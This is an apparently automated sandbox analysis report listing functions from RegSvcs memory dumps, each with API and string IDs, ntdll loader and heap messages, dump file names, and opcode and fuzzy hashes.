                                                                          Function 01129126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$@
                                                                          • API String ID: 3446177414-1194432280
                                                                          • Opcode ID: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                                          • Instruction ID: c67ad88442727b8bdbba4f81649f13f860a41032ee50c5335b197ea493dab8a6
                                                                          • Opcode Fuzzy Hash: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                                          • Instruction Fuzzy Hash: FA810A71D002799BDB3ADB54CC44BEEB6B8AF49754F1041DAEA19B7240D7709E84CFA0
                                                                          Function 01164960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0Iv$0Iv$0Iv$X
                                                                          • API String ID: 3446177414-728256981
                                                                          • Opcode ID: 0b5a195596d4910e255572a88fcb27f22f5e9aca73178592ad11a90d13e8d5c0
                                                                          • Instruction ID: 83a9face406ae775e1d3e281e2a23b828c22398b1aecc28350ecd0245eb814cf
                                                                          • Opcode Fuzzy Hash: 0b5a195596d4910e255572a88fcb27f22f5e9aca73178592ad11a90d13e8d5c0
                                                                          • Instruction Fuzzy Hash: F531BF3190021AFBCF26CF58E848B8D7BB9ABD9758F054019FD0596245D7728AB0DF86
                                                                          Function 0114DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                          • API String ID: 3446177414-56086060
                                                                          • Opcode ID: d2d5b8fd3b509e04a32c6a7915e2abb33db1e1c58e48924c10c0ee7827ccb170
                                                                          • Instruction ID: f573f6a13e45a8e6aa6d1cdadab924fc1b097e6af6901c7ed0647604437072e1
                                                                          • Opcode Fuzzy Hash: d2d5b8fd3b509e04a32c6a7915e2abb33db1e1c58e48924c10c0ee7827ccb170
                                                                          • Instruction Fuzzy Hash: 0E416830600B46DFDB2EEF68D485B69B7F4FF15B28F248169E5014B791C774A882CB91
                                                                          Function 011A4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011A4899
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011A4888
                                                                          • LdrpCheckRedirection, xrefs: 011A488F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 3446177414-3154609507
                                                                          • Opcode ID: 41e2868b9a652567d89c9c1b9bfc1184e220c2e7b03ef832743893baf6c12592
                                                                          • Instruction ID: 78a1d93b4d42e9cc0e8a1369fc583e83705ab0db2ecfbb91fd049db5d3384470
                                                                          • Opcode Fuzzy Hash: 41e2868b9a652567d89c9c1b9bfc1184e220c2e7b03ef832743893baf6c12592
                                                                          • Instruction Fuzzy Hash: 7741E63AA006919FCB29CF9CE840A267FE5FF49A50F4A016DED85D7B12D7B0D800CB81
                                                                          Function 0114DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                          • API String ID: 3446177414-3526935505
                                                                          • Opcode ID: eac4616424afa45210fa528032ca8739f466dbbf289490f915a1e5d2ba74d66a
                                                                          • Instruction ID: 1c1492c3c99cf7be4eb8c29a4d57e520ee41f9d311b37a43799334af22ed25e1
                                                                          • Opcode Fuzzy Hash: eac4616424afa45210fa528032ca8739f466dbbf289490f915a1e5d2ba74d66a
                                                                          • Instruction Fuzzy Hash: 7E314935104B85DFEB2FFB6CD809B557BE4EF12B14F04805DE4428BA52C7B8A882CB56
                                                                          Function 0111C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $
                                                                          • API String ID: 3446177414-3993045852
                                                                          • Opcode ID: 0a646566f239807f8de2bdcb2fd2715c3900b9ae199e3a5879e4cfb908752f30
                                                                          • Instruction ID: 287ccb152462333bc95c098463874adfc17a2485e679fe3341550c693288a821
                                                                          • Opcode Fuzzy Hash: 0a646566f239807f8de2bdcb2fd2715c3900b9ae199e3a5879e4cfb908752f30
                                                                          • Instruction Fuzzy Hash: 8F115E32904218EBCF1AEFA4F84869C7B71FF54764F208519F926672D0CB715A40CB40
                                                                          Function 0114EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0617b135655d457f109412ca8d01fca6d3f0d049844447ab03ec9e164cb22c57
                                                                          • Instruction ID: c1b688e1ab7633a2117326e921e3ea20e8fb1fd6d1429f934780eafdecdf0ef1
                                                                          • Opcode Fuzzy Hash: 0617b135655d457f109412ca8d01fca6d3f0d049844447ab03ec9e164cb22c57
                                                                          • Instruction Fuzzy Hash: 29E10E71D00609DFCB29CFADD984AADBBF1BF88714F24452AE946A7361D770A842CF11
                                                                          Function 0119EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: d1b22ecebddd89d9f55636be94bc1e83983dd61fdbad645bbc7b4228cd8cbc6e
                                                                          • Instruction ID: 94db279a3c1a26f9124587c97a34c3d16372f9cb3a4d9dfe44b4044ce6149ec6
                                                                          • Opcode Fuzzy Hash: d1b22ecebddd89d9f55636be94bc1e83983dd61fdbad645bbc7b4228cd8cbc6e
                                                                          • Instruction Fuzzy Hash: DB714971E0021AAFDF09CFA4C984ADDBBB5BF48314F14402AE915FB254D734A946CB95
                                                                          Function 0119F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: d8d541f46624ddcc8a3ec63b6d831139c2641bfdce59f0fbf175ce254904003d
                                                                          • Instruction ID: 3f13d0a36aaefd65e3ffd5e2f5635d7ed3cd5e9f3d9eb2914bbc2bfacd1fa0d6
                                                                          • Opcode Fuzzy Hash: d8d541f46624ddcc8a3ec63b6d831139c2641bfdce59f0fbf175ce254904003d
                                                                          • Instruction Fuzzy Hash: C1512275E0421AAFDF09CF98D8496DCBFB5BF48314F14812AE925EB250D7389A42CF54
                                                                          Function 01157B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                          • String ID:
                                                                          • API String ID: 4281723722-0
                                                                          • Opcode ID: 87f00ec702adf4ce07f3ad37948722c2e5fee847a225ce75c4a8272453a9da45
                                                                          • Instruction ID: 40b3460f1412fcfbe0859865fd3261060f475b4beb1a83648fdfd2b20426102e
                                                                          • Opcode Fuzzy Hash: 87f00ec702adf4ce07f3ad37948722c2e5fee847a225ce75c4a8272453a9da45
                                                                          • Instruction Fuzzy Hash: 16315671E00219AFCF29DFA8E848A9DBBF0FB58724F20416AE522B7380DB355901CF54
                                                                          Function 011259C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: bb8edcc7ba960592e9e097a0ce17321d68ba11068a20d573f8fbdbb31a1d7f77
                                                                          • Instruction ID: c8721a933ebfade0a1a10d58c2c741a304bf0aee989c86ea5f92fbe57aad7b54
                                                                          • Opcode Fuzzy Hash: bb8edcc7ba960592e9e097a0ce17321d68ba11068a20d573f8fbdbb31a1d7f77
                                                                          • Instruction Fuzzy Hash: CD329C70D0426ADFDB69DF68C884BEDBBB5BF08304F0081E9D549A7281E7749A94CF91
                                                                          Function 01167D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                          • Instruction ID: 18448e034cf2adb590f5c04ac2b0a9ec6978416bf7b19a4720412bea6a87b82b
                                                                          • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                          • Instruction Fuzzy Hash: 1F91EA71E002169FDF2CDF6DC880ABEBBA9EF44728F14455AE961E72C0D7368960C752
                                                                          Function 0113D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Bl$l
                                                                          • API String ID: 3446177414-208461968
                                                                          • Opcode ID: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                                          • Instruction ID: b1fa001f40a4836feb827fe0c9561b4f7f275e2f30b9a33e85191523155cb5e2
                                                                          • Opcode Fuzzy Hash: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                                          • Instruction Fuzzy Hash: 57A1F470A003298BEF39DB98E890BEDB7B5BB84704F4540E9D90967649CB74AEC4CF51
                                                                          Function 01165DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 01165E34
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__start
                                                                          • String ID: pow
                                                                          • API String ID: 3213639722-2276729525
                                                                          • Opcode ID: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                                          • Instruction ID: a24f2c32d1231f0ea3efd295b11bf1194a26fedd06aa54f94d9490656e6b6fb7
                                                                          • Opcode Fuzzy Hash: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                                          • Instruction Fuzzy Hash: B6517871B1C202E6DB6DB61CD9053796F9DAB00790F10C968E0D6C6299EB3784B5874B
                                                                          Function 01154C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$Flst
                                                                          • API String ID: 0-758220159
                                                                          • Opcode ID: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                                          • Instruction ID: 58b57e476f8c99679cb18f05f5ba7aa75b7dd15aa059e2006cc53edd52547216
                                                                          • Opcode Fuzzy Hash: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                                          • Instruction Fuzzy Hash: DA51AEB1E00208CFDF6ACFA9C4886ADFBF4FF54354F15802AD4299B651EB719981CB80
                                                                          Function 0114D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 0114D959
                                                                            • Part of subcall function 01124859: RtlDebugPrintTimes.NTDLL ref: 011248F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
